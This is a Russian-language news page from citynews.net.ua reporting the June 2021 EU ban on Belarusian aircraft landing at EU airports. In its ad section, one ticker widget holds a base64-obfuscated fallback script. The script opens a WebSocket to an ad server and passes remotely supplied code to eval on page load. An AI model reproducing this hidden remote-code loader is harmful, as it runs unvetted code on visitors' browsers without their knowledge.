<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-1689781-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-1689781-1');
</script>

<meta charset="utf-8">
<title>Белорусским самолетам запретили посадку в аэропортах стран Евросоюза &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Белорусским самолетам запретили посадку в аэропортах ЕС. Официальный документ ожидается сегодня.  Белорусским самолетам запретили посадку в аэропортах ЕС. Официальный документ ожидается сегодня. Как сообщил журналист Рикард Йозвяк в своем Twitter, Послы Евросоюза поддержали запрет для посадки">
<meta name="keywords" content="сегодня, Белорусским, самолетам, полеты, в аэропортах ЕС, белорусских, запрет, Йозвяк, самолетов, посадку, документ, ожидается, в аэропортах, Официальный, запретили, Украиной, между, авиасообщение, Республики, прекратить">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Белорусским самолетам запретили посадку в аэропортах стран Евросоюза">
<meta property="og:url" content="http://www.citynews.net.ua/ukrainenews/86769-belorusskim-samoletam-zapretili-posadku-v-ajeroportah-stran-evrosojuza.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2021-06/medium/1622797654_ryanair.jpg">
<meta property="og:description" content="Белорусским самолетам запретили посадку в аэропортах ЕС. Официальный документ ожидается сегодня. Как сообщил журналист Рикард Йозвяк в своем Twitter, Послы Евросоюза поддержали запрет для посадки самолетов белорусских авиаперевозчиков в аэропортах ЕС. Запрет начнет действовать с 5 июня.По его">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/ukrainenews/86769-belorusskim-samoletam-zapretili-posadku-v-ajeroportah-stran-evrosojuza.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/ukrainenews/" itemprop="url"><span itemprop="title">Новости Украины</span></a></span> &raquo; Белорусским самолетам запретили посадку в аэропортах стран Евросоюза</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>Белорусским самолетам запретили посадку в аэропортах стран Евросоюза</h1>
<a href="http://www.citynews.net.ua/2021/06/04/" ><span class="date">Сегодня, 12:09</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/ukrainenews/print:page,1,86769-belorusskim-samoletam-zapretili-posadku-v-ajeroportah-stran-evrosojuza.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/ukrainenews/86769-belorusskim-samoletam-zapretili-posadku-v-ajeroportah-stran-evrosojuza.html" data-title="Белорусским самолетам запретили посадку в аэропортах стран Евросоюза"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><img src="/uploads/posts/2021-06/medium/1622797654_ryanair.jpg" alt="" style="display:block;margin-left:auto;margin-right:auto;">Белорусским самолетам запретили посадку в аэропортах ЕС. Официальный документ ожидается сегодня. </p>
<p>Как сообщил журналист Рикард Йозвяк в своем Twitter, Послы Евросоюза поддержали запрет для посадки самолетов белорусских авиаперевозчиков в аэропортах ЕС. Запрет начнет действовать с 5 июня.<br>По его данным, официально запрет оформят сегодня днем.</p>
<p>«Послы ЕС дали зеленый свет запрету на посадку любых самолетов белорусских перевозчиков в аэропортах ЕС. Он должен вступить в силу в полночь», — написал Йозвяк.</p>
<p>Ранее <a href="http://www.citynews.net.ua/news/86677-ukraina-prekraschaet-aviasoobschenie-s-belarusju.html">Кабинет министров Украины решил прекратить авиасообщение между Украиной и Беларусью с 26 мая</a> и запретил полеты над белорусской территорией.</p>
<p>Кроме того, украинским авиакомпаниям и самолетам запрещено выполнять полеты в воздушном пространстве Республики Беларусь.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/news/86677-ukraina-prekraschaet-aviasoobschenie-s-belarusju.html">Украина прекращает авиасообщение с Беларусью</a></li><li><a href="http://www.citynews.net.ua/news/83889-v-es-soglasovali-reshenie-o-prodlenii-na-god-sankcij-protiv-rossii-iz-za-anneksii-kryma.html">В ЕС согласовали решение о продлении на год санкций против России из-за аннексии Крыма</a></li><li><a href="http://www.citynews.net.ua/ukrainenews/78966-ukraina-vsled-za-es-otkazalas-ot-samoletov-boeing-737-max.html">Украина вслед за ЕС отказалась от самолетов Boeing 737 Max</a></li><li><a href="http://www.citynews.net.ua/ukrainenews/61323-sovet-es-27-fevralya-utverdit-mehanizm-priostanovki-bezvizovogo-rezhima-s-ukrainoy.html">Совет ЕС 27 февраля утвердит механизм приостановки безвизового режима с Украиной</a></li><li><a href="http://www.citynews.net.ua/ukrainenews/55383-es-prodlil-na-god-zapret-na-investicii-v-krym.html">ЕС продлил на год запрет на инвестиции в Крым</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Сегодня, 13:40</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86771-kuleba-budet-otvet-na-priglashenie-lukashenko-boevikov-lnr-v-belarus-dlja-doprosa-oppozicionera.html">Кулеба: Будет ответ на приглашение Лукашенко боевиков «ЛНР» в Беларусь для допроса оппозиционера</a></h4><span>Сегодня, 12:09</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86769-belorusskim-samoletam-zapretili-posadku-v-ajeroportah-stran-evrosojuza.html">Белорусским самолетам запретили посадку в аэропортах стран Евросоюза</a></h4><span>Сегодня, 12:03</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86768-mestnye-bjudzhety-luganskoj-oblasti-poluchili-55-mln-griven-ot-licenzirovanija-alkogolja-tabaka-i-topliva.html">Местные бюджеты Луганской области получили 5,5 млн гривень от лицензирования алкоголя, табака и топлива</a></h4><span>Сегодня, 09:56</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86762-za-3-ijunja-v-luganskoj-oblasti-laboratorno-podtverzhdeno-24-novyh-sluchaja-covid-19.html">За 3 июня в Луганской области лабораторно подтверждено 24 новых случая COVID-19</a></h4><span>Сегодня, 09:52</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86761-oos-3-ijunja-narushenij-rezhima-prekraschenija-ognja-ne-zafiksirovano.html">ООС: 3 июня нарушений режима прекращения огня не зафиксировано</a></h4><span>Вчера, 18:33</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86760-zhiteli-okkupirovannogo-luganska-oblasti-mogut-zapisatsja-na-privivku-ot-covid-19-v-ukraine.html">Жители оккупированного Луганска могут записаться на прививку от COVID-19 в Украине</a></h4><span>Вчера, 18:17</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86759-rabotnikam-alchevskogo-metkombinata-uzhe-4-mesjaca-ne-platjat-zarplatu.html">Работникам Алчевского меткомбината уже 4 месяца не платят зарплату</a></h4><span>Вчера, 15:37</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86757-v-popasnoj-nachali-sterilizovat-bezdomnyh-zhivotnyh.html">В Попасной начали стерилизовать бездомных животных</a></h4><span>Вчера, 14:14</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86756-v-luganskoj-oblasti-perenesli-prazdnovanie-dnja-oblasti-iz-za-shtormovogo-preduprezhdenija.html">В Луганской области перенесли празднование Дня области из-за штормового предупреждения</a></h4><span>Вчера, 13:37</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86755-kak-zhiteljam-luganska-poluchit-stipendiju-na-obuchenie-v-ukrainskih-vuzah.html">Как жителям Луганска получить стипендию на обучение в украинских вузах</a></h4><span>Вчера, 12:34</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86754-zelenskij-poruchil-za-2-mesjaca-podgotovit-zakony-o-perehodnom-pravosudii-na-vremenno-okkupirovannyh-territorijah-doneckoj-i-luganskoj-oblastej.html">Зеленский поручил за 2 месяца подготовить законы о переходном правосудии на временно оккупированных территориях Донецкой и Луганской областей</a></h4><span>Вчера, 12:05</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/86753-v-verhovnoj-rade-hotjat-uravnjat-porjadok-vyplaty-pensij-i-socialnoj-pomoschi-vpl-s-ostalnymi-pensionerami-ukrainy.html">В Верховной раде хотят уравнять порядок выплаты пенсий и социальной помощи ВПЛ с остальными пенсионерами Украины</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Сегодня, 12:09</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86769-belorusskim-samoletam-zapretili-posadku-v-ajeroportah-stran-evrosojuza.html">Белорусским самолетам запретили посадку в аэропортах стран Евросоюза</a></h4><span>Сегодня, 11:39</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86767-v-kieve-budut-monitorit-kolichestvo-parkomest-zarabotala-cifrovaja-programma.html">В Киеве будут мониторить количество паркомест: заработала цифровая программа</a></h4><span>Вчера, 18:08</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86758-kirpich-ruchnoj-formovki-preimuschestva-materiala.html">Кирпич ручной формовки – преимущества материала</a></h4><span>1-06-2021, 13:05</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86736-v-kieve-jelektrosamokaty-priravnjajut-k-velosipedam.html">В Киеве электросамокаты приравняют к велосипедам</a></h4><span>31-05-2021, 13:07</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86723-30-maja-v-karpatah-vypal-sneg.html">30 мая в Карпатах выпал снег</a></h4><span>31-05-2021, 09:35</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86716-v-odesse-otkrylsja-centr-massovoj-vakcinacii-protiv-covid-19.html">В Одессе открылся центр массовой вакцинации против COVID-19</a></h4><span>25-05-2021, 12:24</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86679-v-centre-kieva-obnaruzhili-tajnik-s-granatometom-i-vzryvchatkoj.html">В центре Киева обнаружили тайник с гранатометом и  взрывчаткой</a></h4><span>24-05-2021, 12:03</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86667-frakcija-sluga-naroda-vygnala-fanata-prezidenta-belarusi-narodnogo-deputata-evgenija-shevchenko.html">Фракция «Слуга народа» выгнала фаната президента Беларуси народного депутата Евгения Шевченко</a></h4><span>21-05-2021, 13:17</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86649-praktichnye-vdohnovljajuschie-ukrashenija-iz-dereva-dlja-doma.html">Практичные, вдохновляющие украшения из дерева для дома</a></h4><span>20-05-2021, 12:04</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86635-sbu-provodit-v-odesskoj-oblasti-antiterroristicheskie-uchenija-blokposty-i-poisk-terroristov.html">СБУ проводит в Одесской области антитеррористические учения - блокпосты и поиск террористов</a></h4><span>20-05-2021, 11:13</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86632-kazhdoe-chetvertoe-predprijatie-kieva-sbrasyvaet-v-dnepr-zagrjaznennuju-vodu.html">Каждое четвертое предприятие Киева сбрасывает в Днепр загрязненную воду</a></h4><span>17-05-2021, 14:50</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/86602-v-kieve-ostanavlivali-metro-iz-za-prygnuvshego-na-relsy-cheloveka.html">В Киеве останавливали метро из-за прыгнувшего на рельсы человека</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
				

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('05','2021','right'); return false;" href="https://www.citynews.net.ua/2021/05/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Июнь 2021&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="1">&nbsp;</td><td  class="day-active-v" ><a class="day-active-v" href="https://www.citynews.net.ua/2021/06/01/" title="Все публикации за 01 июня 2021">1</a></td><td  class="day-active-v" ><a class="day-active-v" href="https://www.citynews.net.ua/2021/06/02/" title="Все публикации за 02 июня 2021">2</a></td><td  class="day-active-v" ><a class="day-active-v" href="https://www.citynews.net.ua/2021/06/03/" title="Все публикации за 03 июня 2021">3</a></td><td  class="day-active-v day-current" ><a class="day-active-v" href="https://www.citynews.net.ua/2021/06/04/" title="Все публикации за 04 июня 2021">4</a></td><td  class="weekday" >5</td><td  class="weekday" >6</td></tr><tr><td  class="day" >7</td><td  class="day" >8</td><td  class="day" >9</td><td  class="day" >10</td><td  class="day" >11</td><td  class="weekday" >12</td><td  class="weekday" >13</td></tr><tr><td  class="day" >14</td><td  class="day" >15</td><td  class="day" >16</td><td  class="day" >17</td><td  class="day" >18</td><td  class="weekday" >19</td><td  class="weekday" >20</td></tr><tr><td  class="day" >21</td><td  class="day" >22</td><td  class="day" >23</td><td  class="day" >24</td><td  class="day" >25</td><td  class="weekday" >26</td><td  class="weekday" >27</td></tr><tr><td  class="day" >28</td><td  class="day" >29</td><td  class="day" >30</td><td colspan="4">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
        <p>Материалы отмеченные рубрикой Пресс-релизы и Заметки публикуются на правах рекламы</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>Белорусским самолетам запретили посадку в аэропортах стран Евросоюза &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Белорусским самолетам запретили посадку в аэропортах ЕС. Официальный документ ожидается сегодня.  Белорусским самолетам запретили посадку в аэропортах ЕС. Официальный документ ожидается сегодня. Как сообщил журналист Рикард Йозвяк в своем Twitter, Послы Евросоюза поддержали запрет для посадки">
<meta name="keywords" content="сегодня, Белорусским, самолетам, полеты, в аэропортах ЕС, белорусских, запрет, Йозвяк, самолетов, посадку, документ, ожидается, в аэропортах, Официальный, запретили, Украиной, между, авиасообщение, Республики, прекратить">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Белорусским самолетам запретили посадку в аэропортах стран Евросоюза">
<meta property="og:url" content="http://www.citynews.net.ua/ukrainenews/86769-belorusskim-samoletam-zapretili-posadku-v-ajeroportah-stran-evrosojuza.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2021-06/medium/1622797654_ryanair.jpg">
<meta property="og:description" content="Белорусским самолетам запретили посадку в аэропортах ЕС. Официальный документ ожидается сегодня. Как сообщил журналист Рикард Йозвяк в своем Twitter, Послы Евросоюза поддержали запрет для посадки самолетов белорусских авиаперевозчиков в аэропортах ЕС. Запрет начнет действовать с 5 июня.По его">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/ukrainenews/86769-belorusskim-samoletam-zapretili-posadku-v-ajeroportah-stran-evrosojuza.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
